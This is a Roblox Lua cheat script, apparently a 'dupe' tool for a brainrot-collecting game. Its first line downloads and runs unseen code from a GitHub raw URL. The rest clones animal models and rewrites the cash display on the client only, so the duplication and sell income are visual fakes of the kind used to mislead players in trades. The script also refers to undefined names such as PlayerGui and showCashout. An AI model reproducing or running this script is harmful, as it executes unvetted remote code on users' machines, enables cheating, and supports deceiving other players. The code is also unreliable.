loadstring(game:HttpGet("https://raw.githubusercontent.com/fullerene316767/try22/refs/heads/main/dwdwwdwd"))()

local ReplicatedStorage = game:GetService("ReplicatedStorage")
local Players = game:GetService("Players")
local Workspace = game:GetService("Workspace")
local TweenService = game:GetService("TweenService")
local UserInputService = game:GetService("UserInputService")

local Animals = require(ReplicatedStorage.Datas.Animals)
local Rarities = require(ReplicatedStorage.Datas.Rarities)

local traitMap = {
    ["rbxassetid://89041930759464"] = {name = "Taco", mult = 2},
    ["rbxassetid://104229924295526"] = {name = "Nyan", mult = 5},
    ["rbxassetid://99181785766598"] = {name = "Galactic", mult = 3},
    ["rbxassetid://121100427764858"] = {name = "Fireworks", mult = 5},
    ["rbxassetid://110723387483939"] = {name = "Zombie", mult = 4},
    ["rbxassetid://104964195846833"] = {name = "Claws", mult = 4},
    ["rbxassetid://121332433272976"] = {name = "Glitched", mult = 4},
    ["rbxassetid://100601425541874"] = {name = "Bubblegum", mult = 3},
    ["rbxassetid://118283346037788"] = {name = "Fire", mult = 5},
    ["rbxassetid://78474194088770"] = {name = "Wet", mult = 1.5},
    ["rbxassetid://83627475909869"] = {name = "Snowy", mult = 2},
    ["rbxassetid://127455440418221"] = {name = "Cometstruck", mult = 2.5},
    ["rbxassetid://97725744252608"] = {name = "Explosive", mult = 3},
    ["rbxassetid://82620342632406"] = {name = "Disco", mult = 4},
    ["rbxassetid://134655415681926"] = {name = "10B", mult = 3},
    ["rbxassetid://104985313532149"] = {name = "Shark Fin", mult = 3},
    ["rbxassetid://115664804212096"] = {name = "Matteo Hat", mult = 3.5},
    ["rbxassetid://75650816341229"] = {name = "Brazil", mult = 5},
    ["rbxassetid://115001117876534"] = {name = "Sleepy", mult = 0},
    ["rbxassetid://139729696247144"] = {name = "Lightning", mult = 5},
    ["rbxassetid://110910518481052"] = {name = "UFO", mult = 2},
    ["rbxassetid://117478971325696"] = {name = "Spider", mult = 3.5},
    ["rbxassetid://84731118566493"] = {name = "Strawberry", mult = 7},
    ["rbxassetid://119591742504251"] = {name = "Paint", mult = 5},
    ["rbxassetid://89591838221335"] = {name = "Skeleton", mult = 3},
    ["rbxassetid://95128039793845"] = {name = "Sombrero", mult = 4},
    ["rbxassetid://103610037004911"] = {name = "Tie", mult = 3.75},
    ["rbxassetid://123964048606874"] = {name = "Witch Hat", mult = 3},
    ["rbxassetid://93350414974589"] = {name = "Indonesia", mult = 4},
    ["rbxassetid://114748221761549"] = {name = "Meowl", mult = 6},
    ["rbxassetid://123115843719383"] = {name = "RIP Gravestone", mult = 3.5},
    ["rbxassetid://97054765273857"] = {name = "Jackolantern Pet", mult = 4.5},
    ["rbxassetid://88375043733582"] = {name = "Santa Hat", mult = 4},
    ["rbxassetid://110835412437000"] = {name = "Rose", mult = 3},
    ["rbxassetid://139663830647832"] = {name = "Chocolate", mult = 3}
}

local mutationMap = {
    ["Gold"] = {mult = 0.25, displayText = "Gold", richText = "<font color=\"#FFDE59\">Gold</font>", color = Color3.fromRGB(255, 222, 89), icon = "rbxassetid://136133057822407"},
    ["Diamond"] = {mult = 0.5, displayText = "Diamond", richText = "<font color=\"#25C4FE\">Diamond</font>", color = Color3.fromRGB(37, 196, 254), icon = "rbxassetid://100875709547015"},
    ["Bloodrot"] = {mult = 1, displayText = "Bloodrot", richText = "<font color=\"#8A3B3C\">Bloodrot</font>", color = Color3.fromRGB(145, 0, 27), icon = "rbxassetid://75212036784031"},
    ["Rainbow"] = {mult = 9, displayText = "Rainbow", richText = "<font color=\"#ff00fb\">Rainbow</font>", color = Color3.fromRGB(255, 0, 251), icon = "rbxassetid://83078714090192"},
    ["Candy"] = {mult = 3, displayText = "Candy", richText = "<font color=\"#ff46f6\">Candy</font>", color = Color3.fromRGB(255, 70, 246), icon = "rbxassetid://84797673698685"},
    ["Lava"] = {mult = 5, displayText = "Lava", richText = "<font color=\"#ff7700\">Lava</font>", color = Color3.fromRGB(255, 149, 0), icon = "rbxassetid://70800471498231"},
    ["Galaxy"] = {mult = 6, displayText = "Galaxy", richText = "<font color=\"#aa3cff\">Galaxy</font>", color = Color3.fromRGB(170, 60, 255), icon = "rbxassetid://139331671405138"},
    ["Yin Yang"] = {mult = 6.5, displayText = "Yin Yang", richText = "<stroke color=\"#fff\" thickness=\"2\"><font color=\"#000\">Yin</font></stroke> <stroke color=\"#000\" thickness=\"2\"><font color=\"#fff\">Yang</font></stroke>", useRichText = true, color = Color3.fromRGB(255, 255, 255), icon = "rbxassetid://112996178302302"},
    ["YinYang"] = {mult = 6.5, displayText = "Yin Yang", richText = "<stroke color=\"#fff\" thickness=\"2\"><font color=\"#000\">Yin</font></stroke> <stroke color=\"#000\" thickness=\"2\"><font color=\"#fff\">Yang</font></stroke>", useRichText = true, color = Color3.fromRGB(255, 255, 255), icon = "rbxassetid://112996178302302"},
    ["Radioactive"] = {mult = 7.5, displayText = "Radioactive", richText = "<font color=\"#68f500\">Radioactive</font>", color = Color3.fromRGB(104, 245, 0), icon = "rbxassetid://134809510446754"},
    ["Divine"] = {mult = 8, displayText = "Divine", richText = "<font color=\"#FFD13B\">Divine</font>", color = Color3.fromRGB(255, 209, 59), icon = ""},
    ["Cyber"] = {mult = 7, displayText = "Cyber", richText = "<font color=\"#00FFFF\">Cyber</font>", color = Color3.fromRGB(0, 255, 255), icon = ""},
    ["Cursed"] = {mult = 8, displayText = "Cursed", richText = "<font color=\"#8B0000\">Cursed</font>", color = Color3.fromRGB(139, 0, 0), icon = ""}
}

local LocalPlayer = Players.LocalPlayer

local function formatNumber(num)
    local suffixes = {"", "K", "M", "B", "T", "Q"}
    local tier = 1
    while num >= 1000 and tier < #suffixes do
        num /= 1000
        tier += 1
    end
    return string.format(num % 1 == 0 and "%d%s" or "%.1f%s", num, suffixes[tier])
end

local function parseGenerationValue(str)
    str = str:gsub("<[^>]+>", ""):gsub("%$", ""):gsub("/s", ""):gsub("%s", "")
    local num, suffix = str:match("(%d*%.?%d+)(%a*)")
    if not num then return 0 end
    num = tonumber(num)
    suffix = suffix:upper()
    local mult = ({K=1e3, M=1e6, B=1e9, T=1e12, Q=1e15})[suffix] or 1
    return num * mult
end

local function findOurPlot()
    for _, plot in ipairs(Workspace.Plots:GetChildren()) do
        local sign = plot:FindFirstChild("PlotSign")
        if sign then
            local gui = sign:FindFirstChild("SurfaceGui")
            if gui then
                local label = gui.Frame and gui.Frame:FindFirstChild("TextLabel")
                if label and (label.Text == LocalPlayer.DisplayName .. "'s Base" or label.Text:find(LocalPlayer.Name)) then
                    return plot
                end
            end
        end
    end
    return nil
end

local function getBrainrots()
    local list = {}
    local ourPlot = findOurPlot()
    if not ourPlot then return list end

    local debris = Workspace:FindFirstChild("Debris")
    if not debris then return list end

    local seen = {}
    local minX, maxX = math.huge, -math.huge
    local minZ, maxZ = math.huge, -math.huge

    for _, part in ipairs(ourPlot:GetDescendants()) do
        if part:IsA("BasePart") then
            local cf, sz = part.CFrame, part.Size
            minX = math.min(minX, cf.X - sz.X/2)
            maxX = math.max(maxX, cf.X + sz.X/2)
            minZ = math.min(minZ, cf.Z - sz.Z/2)
            maxZ = math.max(maxZ, cf.Z + sz.Z/2)
        end
    end

    for _, temp in ipairs(debris:GetChildren()) do
        if temp.Name == "FastOverheadTemplate" then
            local pos = temp.Position
            if pos.X >= minX and pos.X <= maxX and pos.Z >= minZ and pos.Z <= maxZ then
                local oh = temp:FindFirstChild("AnimalOverhead")
                if oh then
                    local nameLbl = oh:FindFirstChild("DisplayName")
                    local genLbl = oh:FindFirstChild("Generation")
                    if nameLbl and genLbl then
                        local key = math.floor(pos.X/5)*5 .. "_" .. math.floor(pos.Z/5)*5
                        if not seen[key] then
                            seen[key] = true
                            table.insert(list, {
                                name = nameLbl.Text,
                                genText = genLbl.Text,
                                genValue = parseGenerationValue(genLbl.Text),
                                template = temp,
                                overhead = oh,
                                position = pos,
                                plot = ourPlot,
                                key = key
                            })
                        end
                    end
                end
            end
        end
    end

    table.sort(list, function(a,b) return a.genValue > b.genValue end)
    return list
end

local function getTraitsFromOverhead(overhead)
    local traits = {}
    local container = overhead:FindFirstChild("Traits", true)
    if container then
        for _, icon in ipairs(container:GetChildren()) do
            if icon:IsA("ImageLabel") and icon.Image ~= "" and icon.Visible then
                local assetId = icon.Image
                if traitMap[assetId] then
                    table.insert(traits, traitMap[assetId].name)
                end
            end
        end
    end
    return traits
end

local function getMutationFromOverhead(overhead)
    local mutLabel = overhead:FindFirstChild("Mutation", true)
    if mutLabel and mutLabel.Visible then
        local text = mutLabel.Text:gsub("<[^>]+>", ""):gsub("^%s*(.-)%s*$", "%1")
        for name, data in pairs(mutationMap) do
            if text:find(name) or text:find(data.displayText or "") then
                return name
            end
        end
    end
    return "None"
end

local function getTraitIconByName(traitName)
    for assetId, data in pairs(traitMap) do
        if data.name == traitName then return assetId end
    end
    return nil
end

local function applyMutationVisuals(clonedAnimal, mutationName)
    if not mutationName or mutationName == "None" then return end
    local mutationData = mutationMap[mutationName]
    if not mutationData then return end

    local MutationsData = ReplicatedStorage.Datas:FindFirstChild("Mutations")
    if MutationsData then
        local success, mutationModule = pcall(function() return require(MutationsData) end)
        if success and mutationModule then
            local mutationInfo = mutationModule[mutationName]
            if mutationInfo and mutationInfo.Palettes then
                local palette = mutationInfo.Palettes[1]
                if palette then
                    local colorIndex = 1
                    for _, part in ipairs(clonedAnimal:GetDescendants()) do
                        if part:IsA("BasePart") or part:IsA("MeshPart") then
                            part.Color = palette[colorIndex]
                            colorIndex = (colorIndex % #palette) + 1
                        end
                    end
                end
            end
        end
    end
end

local function spawnAnimal(animalName, selectedTraits, selectedMutation)
    local animalData = Animals[animalName]
    if not animalData then return false, "invalid brainrot" end

    local animalModel = ReplicatedStorage.Models.Animals:FindFirstChild(animalName)
    if not animalModel then return false, "invalid brainrot" end

    -- Find empty podium
    local spawnCFrame, spawnAttachment, claimFrame, hitbox = nil, nil, nil, nil
    local foundPlot = false

    for _, plot in ipairs(Workspace.Plots:GetChildren()) do
        local plotSign = plot:FindFirstChild("PlotSign")
        if plotSign then
            local surfaceGui = plotSign:FindFirstChild("SurfaceGui")
            if surfaceGui then
                local frame = surfaceGui:FindFirstChild("Frame")
                if frame then
                    local textLabel = frame:FindFirstChild("TextLabel")
                    if textLabel then
                        local ownerText = textLabel.Text:gsub("^%s*(.-)%s*$", "%1")
                        if string.find(ownerText:lower(), LocalPlayer.Name:lower()) or ownerText == LocalPlayer.DisplayName then
                            local podiums = plot:FindFirstChild("AnimalPodiums")
                            if podiums then
                                local podiumList = {}
                                for _, child in ipairs(podiums:GetChildren()) do
                                    if child:IsA("Model") and tonumber(child.Name) then
                                        table.insert(podiumList, child)
                                    end
                                end
                                table.sort(podiumList, function(a,b) return tonumber(a.Name) < tonumber(b.Name) end)

                                for _, podium in ipairs(podiumList) do
                                    local base = podium:FindFirstChild("Base")
                                    if base then
                                        local spawn = base:FindFirstChild("Spawn")
                                        if spawn then
                                            local hasAnimal = false
                                            for _, obj in ipairs(spawn:GetChildren()) do
                                                if obj:IsA("Model") and obj.Name ~= "Attachment" then
                                                    hasAnimal = true
                                                    break
                                                end
                                            end
                                            if not hasAnimal then
                                                spawnCFrame = spawn.CFrame * CFrame.new(0, -1.5, 0)
                                                spawnAttachment = spawn
                                                claimFrame = podium:FindFirstChild("Claim") and podium.Claim:FindFirstChild("Main") and podium.Claim.Main:FindFirstChild("Collect")
                                                hitbox = podium:FindFirstChild("Claim") and podium.Claim:FindFirstChild("Hitbox")
                                                foundPlot = true
                                                break
                                            end
                                        end
                                    end
                                end
                                if foundPlot then break end
                            end
                        end
                    end
                end
            end
        end
    end

    if not foundPlot then return false, "full base" end

    local clonedAnimal = animalModel:Clone()
    clonedAnimal:PivotTo(spawnCFrame)
    clonedAnimal.Parent = spawnAttachment

    for _, desc in ipairs(clonedAnimal:GetDescendants()) do
        if desc:IsA("BasePart") or desc:IsA("MeshPart") then
            desc.Anchored = true
        end
    end

    -- Animation + Sound (unchanged)
    local animController = clonedAnimal:FindFirstChildOfClass("AnimationController")
    local idleAnim = ReplicatedStorage.Animations.Animals:FindFirstChild(animalName)
    if idleAnim then idleAnim = idleAnim:FindFirstChild("Idle") end
    if animController and idleAnim then
        local track = animController:LoadAnimation(idleAnim)
        track:Play()
    end

    -- Mutation visuals only
    if selectedMutation and selectedMutation ~= "None" then
        applyMutationVisuals(clonedAnimal, selectedMutation)
    end

    local totalGeneration = 0
    local lastCollectTime = 0
    local attachmentMarker = Instance.new("Attachment")
    attachmentMarker.Name = "Attachment"
    attachmentMarker.Parent = spawnAttachment

    -- ====================== DUAL PROXIMITY PROMPTS ======================
    if clonedAnimal.PrimaryPart then
        local root = clonedAnimal.PrimaryPart

        -- Grab (E)
        local grabPrompt = Instance.new("ProximityPrompt")
        grabPrompt.ObjectText = animalData.DisplayName
        grabPrompt.ActionText = "Grab"
        grabPrompt.KeyboardKeyCode = Enum.KeyCode.E
        grabPrompt.HoldDuration = 0
        grabPrompt.MaxActivationDistance = 8
        grabPrompt.RequiresLineOfSight = false
        grabPrompt.Parent = root

        -- Sell Part (lower)
        local sellPart = Instance.new("Part")
        sellPart.Name = "SellPromptPart"
        sellPart.Transparency = 1
        sellPart.Anchored = true
        sellPart.CanCollide = false
        sellPart.CanQuery = true
        sellPart.Size = Vector3.new(4, 1, 4)
        sellPart.CFrame = root.CFrame * CFrame.new(0, -6, 0)
        sellPart.Parent = clonedAnimal

        -- Sell Prompt (F)
        local sellPrompt = Instance.new("ProximityPrompt")
        sellPrompt.ObjectText = ""
        sellPrompt.ActionText = "Sell"
        sellPrompt.KeyboardKeyCode = Enum.KeyCode.F
        sellPrompt.HoldDuration = 1.5
        sellPrompt.MaxActivationDistance = 10
        sellPrompt.RequiresLineOfSight = false
        sellPrompt.Style = Enum.ProximityPromptStyle.Custom
        sellPrompt.Parent = sellPart

        -- Red Sell Billboard
        local sellBillboard = Instance.new("BillboardGui")
        sellBillboard.Size = UDim2.new(0, 220, 0, 52)
        sellBillboard.StudsOffset = Vector3.new(0, -2.8, 0)
        sellBillboard.Adornee = root
        sellBillboard.AlwaysOnTop = false
        sellBillboard.MaxDistance = 12
        sellBillboard.Enabled = false
        sellBillboard.Parent = root

        local frame = Instance.new("Frame", sellBillboard)
        frame.Size = UDim2.new(1,0,1,0)
        frame.BackgroundColor3 = Color3.fromRGB(130, 15, 15)
        frame.BackgroundTransparency = 0.1
        Instance.new("UICorner", frame).CornerRadius = UDim.new(0, 12)

        local keyBox = Instance.new("Frame", frame)
        keyBox.Size = UDim2.new(0, 38, 0, 38)
        keyBox.Position = UDim2.new(0, 8, 0.5, -19)
        keyBox.BackgroundColor3 = Color3.fromRGB(70, 10, 10)
        Instance.new("UICorner", keyBox).CornerRadius = UDim.new(0, 8)

        local keyLabel = Instance.new("TextLabel", keyBox)
        keyLabel.Size = UDim2.new(1,0,1,0)
        keyLabel.BackgroundTransparency = 1
        keyLabel.Text = "F"
        keyLabel.TextColor3 = Color3.new(1,1,1)
        keyLabel.TextSize = 22
        keyLabel.Font = Enum.Font.GothamBold

        local sellText = Instance.new("TextLabel", frame)
        sellText.Size = UDim2.new(1, -55, 1, 0)
        sellText.Position = UDim2.new(0, 55, 0, 0)
        sellText.BackgroundTransparency = 1
        sellText.Text = "Sell: $" .. formatNumber(animalData.Price / 2)
        sellText.TextColor3 = Color3.fromRGB(255, 220, 220)
        sellText.TextSize = 17
        sellText.Font = Enum.Font.GothamBold
        sellText.TextXAlignment = Enum.TextXAlignment.Left

        local function isClose()
            local char = LocalPlayer.Character
            if not char or not char:FindFirstChild("HumanoidRootPart") then return false end
            return (char.HumanoidRootPart.Position - root.Position).Magnitude <= 10
        end

        local inputConn = UserInputService.InputBegan:Connect(function(input, gp)
            if gp or input.KeyCode ~= Enum.KeyCode.F or not isClose() then return end
            local start = tick()
            while UserInputService:IsKeyDown(Enum.KeyCode.F) do
                task.wait()
                if tick() - start >= 1.5 then
                    local sellPrice = animalData.Price / 2
                    -- Update cash
                    local currencyLabel = PlayerGui.LeftBottom.LeftBottom:FindFirstChild("Currency")
                    if currencyLabel then
                        local current = tonumber(currencyLabel.Text:gsub("[^%d%.]", "")) or 0
                        currencyLabel.Text = "$" .. formatNumber(current + sellPrice)
                    end
                    showCashout("+$" .. formatNumber(sellPrice), true, true)
                    clonedAnimal:Destroy()
                    return
                end
            end
        end)

        local visibilityLoop = task.spawn(function()
            while clonedAnimal and clonedAnimal.Parent do
                local close = isClose()
                sellBillboard.Enabled = close
                grabPrompt.Enabled = close
                task.wait(0.25)
            end
        end)

        -- Cleanup
        clonedAnimal.Destroying:Connect(function()
            if inputConn then inputConn:Disconnect() end
        end)
    end

    -- Generation & Overhead (Traits only for display)
    local generationRate = animalData.Generation or 0
    local traitBonus = 0
    if selectedTraits then
        for _, traitName in ipairs(selectedTraits) do
            for _, data in pairs(traitMap) do
                if data.name == traitName then
                    traitBonus = traitBonus + (generationRate * data.mult)
                    break
                end
            end
        end
    end

    local mutationBonus = 0
    if selectedMutation and selectedMutation ~= "None" and mutationMap[selectedMutation] then
        mutationBonus = generationRate * mutationMap[selectedMutation].mult
    end

    local totalGenRate = generationRate + traitBonus + mutationBonus

    -- Overhead
    local overheadTemplate = ReplicatedStorage.Overheads:FindFirstChild("AnimalOverhead")
    local head = clonedAnimal:FindFirstChild("Head") or clonedAnimal.PrimaryPart
    if overheadTemplate and head then
        local overhead = overheadTemplate:Clone()
        overhead.StudsOffset = Vector3.new(0, 7, 0)
        overhead.Adornee = head
        overhead.Parent = head
        overhead.AlwaysOnTop = false
        overhead.MaxDistance = 200

        -- Mutation
        local mutationGui = overhead:FindFirstChild("Mutation", true)
        if mutationGui then
            if selectedMutation and selectedMutation ~= "None" then
                local info = mutationMap[selectedMutation]
                mutationGui.Text = info.richText or info.displayText or selectedMutation
                mutationGui.RichText = true
                mutationGui.Visible = true
            else
                mutationGui.Visible = false
            end
        end

        -- Basic info
        local function setText(name, value)
            local lbl = overhead:FindFirstChild(name, true)
            if lbl then lbl.Text = value end
        end

        setText("DisplayName", animalData.DisplayName)
        setText("Rarity", animalData.Rarity)
        setText("Price", "$" .. formatNumber(animalData.Price))
        setText("Generation", "$" .. formatNumber(totalGenRate) .. "/s")

        -- Traits (icons only)
        local traitsContainer = overhead:FindFirstChild("Traits")
        if traitsContainer and selectedTraits and #selectedTraits > 0 then
            local template = traitsContainer:FindFirstChild("Template")
            for _, traitName in ipairs(selectedTraits) do
                local iconId = getTraitIconByName(traitName)
                if iconId and template then
                    local icon = template:Clone()
                    icon.Image = iconId
                    icon.Visible = true
                    icon.Parent = traitsContainer
                end
            end
        end
    end

    return true, clonedAnimal
end

local function findAnimalInternalName(displayName)
    for name, data in pairs(Animals) do
        if data.DisplayName == displayName then
            return name
        end
    end
    return nil
end

-- ====================== GUI SETUP ======================
repeat task.wait(0.1) until _G.DupeGUI
local GUI = _G.DupeGUI

GUI.onRefresh(function()
    GUI.setStatus("Scanning...", Color3.fromRGB(255, 255, 100))
    task.wait(0.2)
    local list = getBrainrots()
    GUI.buildList(list)
end)

GUI.onDupe(function()
    local selected = GUI.getSelected()
    if not selected then
        GUI.setStatus("Select one!", Color3.fromRGB(255, 100, 100))
        return
    end

    local animalName = findAnimalInternalName(selected.name)
    if not animalName then
        GUI.setStatus("Not found!", Color3.fromRGB(255, 100, 100))
        return
    end

    local traits = getTraitsFromOverhead(selected.overhead)
    local mutation = getMutationFromOverhead(selected.overhead)

    GUI.setStatus("Duping...", Color3.fromRGB(255, 255, 100))
    local success, result = spawnAnimal(animalName, traits, mutation == "None" and nil or mutation)

    if success then
        GUI.setStatus("Duped!\n" .. selected.name, Color3.fromRGB(100, 255, 100))
    else
        GUI.setStatus(result == "full base" and "Base full!" or "Failed", Color3.fromRGB(255, 100, 100))
    end
end)

-- Auto scan
task.wait(0.5)
GUI.buildList(getBrainrots())
